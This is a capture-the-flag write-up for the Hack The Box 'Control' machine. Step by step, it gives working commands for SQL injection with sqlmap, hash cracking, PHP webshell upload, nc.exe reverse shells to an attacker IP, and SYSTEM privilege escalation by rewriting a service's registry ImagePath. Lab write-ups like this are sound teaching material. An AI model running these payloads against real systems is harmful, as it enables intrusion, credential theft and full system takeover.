Step 1. Reconnaissance & Enumeration
Let’s start with the nmap scan
nmap -Pn -n -p- control.htb --min-rate=1000 | tee port_scan.txt
cat port_scan.txt | grep "open" | tr '/' ' ' > port_scan.txt
cat port_scan.txt | cut -d ' ' -f 1 | sort -n > port_scan.txt
cat port_scan.txt | tr '\n' ',' | sed s/,$// > port_scan.txt
Version scan reports following information.
▶ nmap -Pn -n -sC -sV -p `cat port_scan.txt` 10.10.10.167 -oA version_scan
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql?
| fingerprint-strings:
| Help, RPCCheck, oracle-tns:
|_ Host '10.10.16.14' is not allowed to connect to this MariaDB server
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=4/7%Time=5E8C5811%P=x86_64-pc-linux-gnu%r(RPC
SF:Check,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.14'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Help,4A,"
SF:F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.14'\x20is\x20not\x20allowed\x20t
SF:o\x20connect\x20to\x20this\x20MariaDB\x20server")%r(oracle-tns,4A,"F\0\
SF:0\x01\xffj\x04Host\x20'10\.10\.16\.14'\x20is\x20not\x20allowed\x20to\x2
SF:0connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
WhatWeb reveals that PHP version 7.3.7 is installed. The IIS version is 10.0, which indicates that this is Windows Server 2016 or Windows Server 2019.
whatweb control.htb
http://control.htb [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.10.10.167], JQuery, Microsoft-IIS[10.0], PHP[7.3.7], Script[text/javascript], Title[Fidelity], X-Powered-By[PHP/7.3.7]
On visiting the admin page we get the error Access Denied: Header Missing. Please ensure you go through proxy. Pressing CTRL + U OR F12 brings up the source. We see a comment about work still needing to be done. Therefore, we check by visiting the website by adding X-Forwarded-For header using burp intereptor.
This is successful and we gain access to the admin page, containing a list of products we can modify and a search functionality.
On browsing we see many files.
With a good list of pages, we see couple of SQL injection attacks. There’s an SQL injection vulnerability in the view_product.php page that can easily be exploited with sqlmap.
sqlmap -H "X-Forwarded-For: 192.168.4.28" -u "http://10.10.10.167/view_product.php" --data
"productId=69" --random-agent
Once the SQL injection is completed we can extract username and password hashes using below command.
sqlmap -H "X-Forwarded-For: 192.168.4.28" -u "http://10.10.10.167/view_product.php" --data
"productId=69" --random-agent --passwords
cat /tmp/sqlmapf8920ty96486/sqlmaphashes-vabxtrqq.txt
root:*0A4A5CAD344718DC418035A1F4D292BA603134D8
manager:*CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
hector:*0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
SQLmap build-in cracker, cracks manager hash as l3tm3!n.
Other passwords can be cracked using john, hashcat or online crackers like crackstation.
hashcat -m 300 hashes /tmp/sqlmapf8920ty96486/sqlmaphashes-vabxtrqq.txt /usr/share/wordlists/rockyou.txt --force
OR
john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/sqlmapf8920ty96486/sqlmaphashes-vabxtrqq.txt
We get the hector user password as l33th4x0rhector.
We need some way to get into the machine. Again, sqlmap have features to upload file. We will use it to upload simple php webshell to execute some command. But we need full path with write permission for that. Looking at gobuster scan, just to get a valid Url we will try at upload.php.
▶ gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -t 20 -x php -u http://10.10.10.167
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.167
[+] Threads: 20
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/04/28 17:30:49 Starting gobuster
===============================================================
/ADMIN.php (Status: 200)
/About.php (Status: 200)
/Admin.php (Status: 200)
/Images (Status: 301)
/Index.php (Status: 200)
/about.php (Status: 200)
/admin.php (Status: 200)
/assets (Status: 301)
/cmd.php (Status: 200)
/database.php (Status: 200)
/images (Status: 301)
/index.php (Status: 200)
/uploads (Status: 301)
===============================================================
2020/04/28 17:38:55 Finished
===============================================================
After some messing around, we uploaded a php webshell through sqlmap and then try to access it.
sqlmap -H "X-Forwarded-For: 192.168.4.28" -u "http://10.10.10.167/view_product.php" --data
"productId=69" --file-write '/usr/share/wordlists/SecLists/Web-Shells/PHP/obfuscated-phpshell
.php' --file-dest 'c:\inetpub\wwwroot\uploads\ps.php'
We modify the request to ps.php file using burp.
POST /uploads/ps.php HTTP/1.1
Host: control.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 192.168.4.28
password=lol&cmd=whoami
and we get the output. Or we can directly upload the p0wny shell
Upon checking we know that hector is in Remote Management Users group, which allows them to use
p0wny@shell:C:\inetpub\wwwroot\uploads# net user hector
User name Hector
Full Name Hector
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 11/1/2019 12:27:50 PM
Password expires Never
Password changeable 11/1/2019 12:27:50 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/28/2020 9:41:02 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use*Users
Global Group memberships *None
The command completed successfully.
Step 2. User Pivoting
Similar to the PHP file we upload nc.exe file to windows machine. We open the reverse connection using following command in PHP shell.
nc -lvp 6677
nc.exe -e cmd 10.10.16.76 6677
We get a normal shell. We first need the hostname.
PS C:\Users\Hector\Documents> hostname
hostname
Fidelity
To get the hector shell we can use 2 ways.
winrm
We can see port 5985 is open, but only accessible from localhost.
C:\inetpub\wwwroot\uploads>netstat -ano
netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 828
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1904
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 456
We got to forward it.
We can forward a port using ssh or using meterpreter session.
ssh -R 5985:127.0.0.1:5895 10.10.16.76
OR
meterpreter> portfwd add -l 5985 -p 5985 -r 127.0.0.1
evil-winrm -u hector -p l33th4x0rhector -i 127.0.0.1
powershell
Then we spawn another listener and run the following commands (equivalent to a runas) to get a reverse Powershell as Hector:
nc -lvp 6677
$pass = convertto-securestring 'l33th4x0rhector' -asplaintext -force
$cred = new-object system.management.automation.pscredential("fidelity\hector", $pass)
invoke-command -computer fidelity -scriptblock { c:\\inetpub\\wwwroot\\uploads\\nc.exe 10.10.16.76 6677 -e powershell.exe } -credential $cred
Upon checking we get the shell with Hector user.
Privilege Escalation
After cheking with privilege escalation scripts like PowerUp.ps1 nothing stands out. The Get-History Powershell command only shows the commands executed in the current session. This is lost when the session is ended. As of Powershell 5.0, introduced with Windows 10, a new feature allows persisting the history in a file:
gc (Get-PSReadlineOption).HistorySavePath
get-content (Get-PSReadlineOption).HistorySavePath
OR
type C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list
Service Registry Enumeration
Manual Registry Check
The user queried the registry. The first command lists the child items of CurrentControlset and the second one its ACLs. It seems that hector has been looking at Registry ACLs and items under CurrentControlSet . Maybe they have changed the permissions somewhere. Service properties exist as subkeys and values under the HKLM:\SYSTEM\CurrentControlSet\Services subkey. If we have permissions to this we can potentially change the binary path for all services. Let’s check the permissions of this subkey.
PS C:\Users\Hector\Documents> get-childitem HKLM:\SYSTEM\CurrentControlset | select -expand name
get-childitem HKLM:\SYSTEM\CurrentControlset | select -expand name
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Hardware Profiles
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Policies
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Software
When Checking the ACLs of CurrentControlset and its child item, we see that Hector has full access on Services:
get-acl HKLM:\SYSTEM\CurrentControlSet\Services | fl
get-acl HKLM:\SYSTEM\CurrentControlSet\Services | format-list
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
Owner : NT AUTHORITY\SYSTEM
Group : NT AUTHORITY\SYSTEM
Access : CREATOR OWNER Allow FullControl
NT AUTHORITY\Authenticated Users Allow ReadKey
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
CONTROL\Hector Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadKey
Audit :
Sddl : O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;KR;;;AU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KA;;;S-1-5-21-3271572904-80546332
-2170161114-1000)(A;CI;KR;;;AC)
We see that Hector has full control. Although we can change the binary path values, this isn’t useful unless we are able to start a particular services running as a privileged used. So we are interested in services running as NT AUTHORITY\SYSTEM , which are configured with a manual start type, that we also have permissions to start.
via Accesschk
accesschk64.exe "Hector" -kwsu HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
sc query seclogon
We can not edit the services with sc config, but we can change the settings using reg add.
#unstable shell gets disconnected after some time
reg add HKLM\System\CurrentControlSet\services\wuauserv /t REG_EXPAND_SZ /v ImagePath /d "C:\inetpub\wwwroot\uploads\nc.exe 10.10.16.76 6677 -e cmd.exe" /f
sc.exe start wuauserv # to start the service
OR
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\seclogon -Name "ImagePath" -Value "C:\inetpub\wwwroot\uploads\nc.exe -e powershell.exe 10.10.16.76 6677"
powershell -c "Start-Service seclogon"
In the newly caught NT AUTHORITY\SYSTEM shell, execute the command below to get a more stable shell.
cmd /c START /B "" C:\inetpub\wwwroot\uploads\nc.exe -e powershell.exe 10.10.16.76 6688
Thanks for reading my writeup and thank you to hackthebox.eu and the machine creators.
References: